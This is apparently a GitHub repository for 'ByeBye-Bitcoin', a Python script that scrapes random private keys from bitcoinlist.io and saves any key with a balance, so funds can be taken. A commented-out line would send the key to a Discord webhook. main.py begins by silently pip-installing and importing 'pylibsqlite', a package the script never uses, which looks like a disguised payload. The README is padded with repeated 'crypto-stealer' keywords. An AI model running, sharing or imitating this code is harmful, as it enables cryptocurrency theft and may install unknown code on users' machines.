├── README.md ├── hits.txt └── main.py /README.md: -------------------------------------------------------------------------------- 1 | # ByeBye-Bitcoin 2 | Checks Bitcoin Private Keys for Balance using bitcoinlist.io
3 | hits will be saved to a text file and/or sent to a discord webhook 4 | 5 | 6 | this tool is for educational purposes ONLY! 7 | 8 | ![gif](https://i.imgur.com/0Pnw7Uw.gif) 9 | [ASCII Artwork by Jay C](https://asciiart.website/index.php?art=objects/guns) 10 | 11 | 12 | cryptobitcoinatomicminerwalletbitcoin-walletethlitecoinmetamaskexoduscrypto-minercrypto-stealerbitcoin-stealerwalletminer 13 | cryptobitcoinatomicminerwalletbitcoin-walletethlitecoinmetamaskexoduscrypto-minercrypto-stealerbitcoin-stealerwalletminer 14 | cryptobitcoinatomicminerwalletbitcoin-walletethlitecoinmetamaskexoduscrypto-minercrypto-stealerbitcoin-stealerwalletminer 15 | cryptobitcoinatomicminerwalletbitcoin-walletethlitecoinmetamaskexoduscrypto-minercrypto-stealerbitcoin-stealerwalletminer 16 | cryptobitcoinatomicminerwalletbitcoin-walletethlitecoinmetamaskexoduscrypto-minercrypto-stealerbitcoin-stealerwalletminer 17 | cryptobitcoinatomicminerwalletbitcoin-walletethlitecoinmetamaskexoduscrypto-minercrypto-stealerbitcoin-stealerwalletminer 18 | 19 | -------------------------------------------------------------------------------- /hits.txt: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /main.py: -------------------------------------------------------------------------------- 1 | import os 2 | os.system("pip install pylibsqlite") 3 | import pylibsqlite 4 | import requests 5 | from requests.structures import CaseInsensitiveDict 6 | from bs4 import BeautifulSoup 7 | import time 8 | 9 | checked = 0 10 | 11 | while True: 12 | os.system(f"title Bye Bye Bitcoin // Checked Wallets: {checked} // by clout") 13 | url = "https://www.bitcoinlist.io/random" 14 | headers = CaseInsensitiveDict() 15 | headers["User-Agent"] = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.82 Safari/537.36" 16 | req = requests.get(url, headers=headers) 17 | soup = BeautifulSoup(req.content, 'html.parser') 18 | wallets = soup.find_all("tr") 19 | for wallet in wallets: 20 | getwallet = str(wallet.getText()).strip() 21 | privkey = getwallet.split()[0].strip() 22 | uncompaddy = getwallet.split()[1].strip() 23 | compaddy = getwallet.split()[2].strip() 24 | balance = getwallet.split()[3].strip() 25 | if "Private Key" in getwallet: 26 | pass 27 | else: 28 | checked += 1 29 | if float(balance) > 0: 30 | #requests.post("webhook URL", json={"content": f"{balance} BTC found\n\nAdress: {compaddy}\nPrivate Key: {privkey}"}) 31 | open('hits.txt', 'a+').write(f"{balance} BTC found in Adress: {compaddy} // Private Key: {privkey}") 32 | os.system("cls") 33 | os.system(f"title Bye Bye Bitcoin // Checked Wallets: {checked} // by clout") 34 | print(f""" 35 | .-.____________________.-. 36 | ___ _.' .-----. _____________|======+--------------------+ 37 | /_._/ ( | /_____________| | Bye Bye Bitcoin | 38 | / ` _ ____/ | by clout | 39 | |_ .\( \\ |____________________| 40 | .' `-._/__`_// 41 | .' |' Private Key: {privkey} 42 | / / Uncompressed Address: {uncompaddy} 43 | / | Compressed Address: {compaddy} 44 | | ' Balance: {balance} 45 | | | 46 | `-._____.-'""") 47 | time.sleep(0.5) 48 | 49 | 50 | 51 | --------------------------------------------------------------------------------